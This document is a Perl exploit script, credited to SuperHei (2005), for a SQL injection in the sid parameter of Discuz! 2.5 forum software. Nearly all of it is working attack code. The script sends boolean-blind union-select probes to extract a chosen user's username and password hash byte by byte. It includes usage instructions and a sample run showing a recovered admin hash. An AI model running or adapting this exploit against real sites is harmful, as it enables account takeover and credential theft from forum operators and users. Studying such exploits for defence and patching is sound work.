
Discuz! 2.5 $sid SQL injection exploit

本文作者:SuperHei
文章性质:原创
发布日期:2005-10-18

#!/usr/bin/perl
#Discuz! 2.5 $sid SQL injection exploit
#Requires magic_quotes_gpc = Off on the target: the payload opens with a single
#quote inside the `sid` parameter, and that quote must reach MySQL unescaped.
#Boolean-blind extraction: every probe is one HTTP request and every byte is a
#binary search, so expect a few hundred requests per account (326 in the sample
#run below).
#Bug found by SuperHei (www.4ngel.net)
#Code based on the exploit by 1dt.w0lf (rst.void.ru) -- thanks!
#
#C:\Perl\bin>dz3.pl http://127.0.0.1/Discuz!_2.5F_gb/upload 1
#Please wait...
#[||||||||||||||||||||||||||||||||||||||]
#
#------------------x REPORT x-------------------
# Uid: 1
# Username: admin
# Password Hash: 25f9e794323b453885f5181f1b624d0b
#------------------x REPORT x-------------------
#total requests: 326

use LWP::UserAgent;

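# ---- Shared state ----------------------------------------------------------
# These are package globals on purpose: found(), crack() and check() below read
# them directly. The script runs without `use strict`, so keep names distinct.
our $path   = $ARGV[0];   # forum base URL, e.g. http://host/bbs (see usage())
our $uid    = $ARGV[1];   # cdb_members.uid whose username and password hash to recover
our $string = "to:";      # marker grep'd for in the response by check(); presumably only
                          # present when the injected condition is true -- TODO confirm

our $s_num   = 1;         # 1-based offset into CONCAT(username, ':', password) being recovered
our $n       = 0;         # running count of HTTP requests (reported at the end)
our $char;                # byte value recovered by found() for offset $s_num (undef = none)
our $allchar = '';        # bytes recovered so far
$|++;                     # autoflush STDOUT so the progress bar appears request by request

usage() if @ARGV < 2;

print "Please wait...\r\n";
print "[";

while (1) {
    # Binary-search the byte at offset $s_num. The upper bound is exclusive in
    # found()/crack(); 256 covers every value MySQL ascii() can return. (The
    # original bound of 122 never tested 'z' or any high byte, so a username
    # containing one was cut short.)
    found(0, 256);

    # substring() past the end of the string yields '' and ascii('') is 0, so a
    # zero -- or no match at all -- means the whole username:hash has been read.
    if (!defined $char || $char == 0) {
        print "]\r\n\r\n";
        my ($name, $hash) = split(":", $allchar);   # CHAR(58) separator from the query
        $name = '' unless defined $name;
        $hash = '' unless defined $hash;
        print "------------------x REPORT x-------------------\r\n";
        print " Uid: $uid\r\n";
        print " Username: $name\r\n";
        print " Password Hash: $hash\r\n";
        print "------------------x REPORT x-------------------\r\n";
        print "total requests: $n\r\n";
        print "nothing recovered: uid may not exist or target may not be injectable\r\n"
            if $allchar eq '';
        exit();
    }

    print "|";
    $allchar .= chr($char);
    $s_num++;
}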

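# found(MIN, MAX): binary-search the byte at offset $s_num over the half-open
# range [MIN, MAX) using ">mid" probes, then hand the final small window to
# crack(). Stores the result in the global $char (undef if nothing matched)
# and returns it as well. Reads the globals $s_num/$path/$uid via check().
# No prototype: the original ($$) was bypassed by the &found(...) call style
# anyway and only complicates parsing.
sub found {
    my ($lo, $hi) = @_;

    # Keep halving while the window is wide; at fewer than five candidates
    # the original switches to a linear scan, which is kept here.
    while (($hi - $lo) >= 5) {
        my $mid = int($hi - ($hi - $lo) / 2);
        if (check(">$mid")) {
            $lo = $mid + 1;   # strictly greater, so $mid itself is out (original re-tested it)
        }
        else {
            $hi = $mid + 1;   # value <= $mid; keep $mid inside the exclusive bound
        }
    }

    $char = crack($lo, $hi);
    return $char;
}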

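# crack(MIN, MAX): probe every value in the half-open range [MIN, MAX) with an
# "=value" condition and return the first one that holds, or undef (empty
# return) when none does. Used by found() once its window is small.
# Lexical loop variable and no prototype, unlike the original, so nothing
# leaks into the package namespace.
sub crack {
    my ($cmin, $cmax) = @_;
    for my $candidate ($cmin .. $cmax - 1) {
        return $candidate if check("=$candidate");
    }
    return;
}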

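# check(COND): issue one boolean-blind probe and report whether it held.
# COND (e.g. ">64" or "=97") is appended to the injected MySQL expression
#   ascii(substring(CONCAT(username,CHAR(58),Password), $s_num, 1))
# Returns 1 when the response body contains the marker $string, 0 otherwise,
# and increments the global request counter $n. The query string is built
# byte-for-byte as in the original (no explicit URL-encoding; the original
# relied on LWP/URI escaping whatever it must), and the request stays a POST
# with an empty body as before.
sub check {
    my $ccheck = $_[0];
    $n++;

    my $http_query = $path
        . "/index.php?sid=' union select null,null,null,null,null from cdb_members where uid="
        . $uid
        . " AND ascii(substring(CONCAT(username,CHAR(58),Password),"
        . $s_num
        . ",1))"
        . $ccheck
        . " /*";

    # print "\r\n $http_query \r\n";   # uncomment to trace each probe

    # One client for the whole run instead of a new object per request.
    our $ua;
    $ua ||= LWP::UserAgent->new() or die "cannot create LWP::UserAgent\n";

    my $res = $ua->post($http_query);

    # A transport failure (refused connection, timeout, DNS) comes back as an
    # LWP-generated response carrying a Client-Warning header. Treating it as
    # "condition false" would silently steer the search toward an empty or
    # wrong result, so stop and say why instead.
    die "request failed: " . $res->status_line . "\n"
        if $res->header('Client-Warning');

    # \Q..\E: $string is a literal marker, not a regex pattern.
    return ($res->content =~ /\Q$string\E/) ? 1 : 0;
}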

# usage(): print the banner and command-line synopsis to STDOUT, then exit.
# Invoked when fewer than two arguments are given.
sub usage {
    my $rule = "=========================================================\r\n";
    my @banner = (
        " Discuz! 2.5 \$sid SQL injection exploit\r\n",
        " Need magic_quotes_gpc = Off \r\n",
    );
    my @synopsis = (
        " Usage: $0 [bbspath/] [uid]\r\n",
        " e.g. : $0 http://127.0.0.1/bbs 1\r\n",
    );
    print $rule, @banner, $rule, @synopsis, $rule;
    exit();
}
